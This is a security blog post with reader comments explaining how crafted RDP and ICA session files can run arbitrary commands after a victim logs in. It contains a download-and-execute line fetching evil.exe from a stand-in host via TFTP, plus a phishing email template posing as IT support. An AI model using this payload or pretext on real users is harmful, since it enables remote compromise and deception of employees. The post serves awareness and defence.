Remote Desktop Command Fixation Attacks
Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management.
When it comes to exploitative penetration testing, I relay on tactics rather then exploits. I’ve already talked about how insecure Remote Desktop services could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit.
Remote Desktop Command Fixation Attacks
The attack is rather simple. All the bad guys need to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious!
But how is it done? Both, RDP and ICA, contain information not only about what servers to connect to but also what applications to launch after successful authentication. As we discussed before, these parameters can be modified to suit the attacker needs. In CITRIX we can specify the default shell command by using the parameter Application (i.e Application=calc.exe). In Windows Remote Desktop we can do exactly the same with the alternate shell (i.e alternate shell:s:cmd.exe) directive. Here follows a sample ICA file:
[WFClient]
Version=1
[ApplicationServers]
Connection To Citrix Server=
[Connection To Citrix Server]
InitialProgram=some command here
Address=172.16.3.191
ScreenPercent=0In Windows Terminal Services, the same can be achieved with the following example. Yes, it is not as clear as it is with CITIRX:
screen mode id:i:1
desktopwidth:i:800
desktopheight:i:600
session bpp:i:16
full address:s:172.16.3.191
compression:i:1
keyboardhook:i:2
alternate shell:s:some command here
shell working directory:s:C:\
bitmapcachepersistenable:i:1This is all that the attackers need to know. Let’s have a step-by-step look at the attack structure, shall we:
- Compose a malicious Remote Desktop session file:
The following example instructs TFTP to connect to evil.com and retrieve a file called evil.exe. Once the download is completed, the attacker executes evil.exe and subsequently terminates the session:screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s:172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s:cmd.exe /C "tftp -i evil.com GET evil.exe evil.exe & evil.exe" shell working directory:s:C:\ bitmapcachepersistenable:i:1 - Send email to the victim:
Here the attacker uses his social engineering skills to persuade the victim into opening and authenticating the session file. This is how it is done:Hello John,
This is Tim from Tech Department. I was informed that you have some problems with your remote desktop connectivity. I’ve attached a modified RDP file you can tryout and see if it works. Just double click on the file and login. Your domain credentials should work. Let me know if you have any problems.
Tim O’Brian
Tech Department - Own it:
The attacker notices a new entry in his TFTP log files. The operation was successful. Now he can take full advantage of their brand new asset.Simple tricks always work.
This is it. This is what I would like to refer to as Remote Desktop Command Fixation Attacks
. They are simple, highly affective, unknown to system administrators, and pretty vicious. Keep in mind that the same procedure apply to CITIRX as well.
What can we do about it?
Filter emails and email content and in general traffic that contains RDP or ICA files. Yes it sounds simple, but it is almost impossible to implement.
comments
now when I am thinking this trick should be called
What can we do about it ? -> Educate users.
djteller, :) yeh right. first of all you have to educate the administrators. What I am trying to show here is how easy it is sometimes to gain remote access without too much effort. The security community and industry in general is sooo much into vulnerability research that they forget to look at the most obvious, the most simplistic, and the most successful threats. Who needs 0days when Andrea Johnson, the secretary from 3rd floor, will unawarely let you in?
Moreover, most people have never heard of Windows Terminal services. The don’t know how they even look like. So, what’s going to happen if the attacker just spawns a full-screen session on their desktop? They will probably think that somehow they logged out; type their username and password, and of course let the attacker in. Simple and effective.
I hate to be asking an obvious question but why is it that filtering *.rdp/*.ica (or whatever the ica extension is) is impossible?
As far as I know Outlook 2007 (the client itself) strips this attachments by itself…
rkd, because the attacker may simply include a link to a remote RDP/ICA file which the user will click on. Of course it gets more suspicious but users will still fall for it. No to mention that RDP and ICA can be delivered to the target in multiple ways.
Any email that urges you to “click this” is a potential attack vector. The barn door was opened when email morphed beyond delivering plain ASCII text. The solution is to block any email that is not plain ASCII. Since users cry when you take their candy away, computers will never be secure. End of story. Get used to it.
hey i posted about something like this on my blog:
http://fazed-darkstar.blogspot.....itrix.html
it basically rely’s on social engineering.
but this is a bit more indepth, nice!
Before I saw rkd’s message I went to test the Outlook attachment stripping on Outlook 2003 and it does not strip .rdp files.
I see that the attack has a hard IP address in it, and of course the attacker would need to know either a name or address. In a corporation this is likely to be a gateway I guess and not a big secret.
I also noticed the “working directory:s:C:\”. Some of us don’t have download and execute rights in our root directories. Is there a more elegant approach to this? Is %TEMP% supported here?
Hey, so great Image at the Top ;)And the tricks and infos too…
If you truly believe security in depth (defense in depth is the common usage), then what are you envisioning? That we have one perfect security measure that is unbreakable? I’m not sure about you, but with the rest of the security industry, it is pretty accepted that there is no silver bullet.
We need and will always need layered defense in order to protect data and systems when one layer is thwarted.
You might say that people will always be a weak link, and that could be true even in an environment with security in depth. In fact, security in depth is even more needed due to the human factor. If people can make stupid mistakes, put up roadblocks, nets, and pointy objects in their way so they don’t stupidly make those mistakes…
Perhaps you have a different definition of “security in depth,” in which case I beg that you explain it so that everyone can move beyond focusing on that statement. Maybe we’re really on the same page and just have different meanings to this rather common security term…
LonerVamp, I am putting a post now, which explains everything in more detail. Thanks.
I’am a little curious - why should my firewall policies allow to forward such outbound connections - and moreover - why should i expose my rdp/ica servers without additional protection (e.g. VPN/certificates) to the outside.
Security comes with layers of it.
Der Klempner
Der Klempner, here are two pictures that explain how the attack works in the most basic form:
is it clearer now?
An easy way to defend this is with an IPS that will shun RDP traffic on 3389 or detecting RDP over a non standard port.
There is a rule on Bleeding Snort to do this.
Isn’t most Citrix-servers set up to NOT allow users to install or execute unknown applications? Will the user be allowed to execute cmd.exe and download and run an unknown file?
Most terminal servers I set up are restricted too, so the user can’t run cmd.exe and evil.exe, only a set of programs specified… of course one of those because of business requirements is Internet Explorer, so game over right there. It is an interesting exploit, but not one that would necessarily work 100% of the time. Could you just MIM them, ie change the citrix/rdp to connect to a server on your network through port 443, then you redirect and capture their user/pass.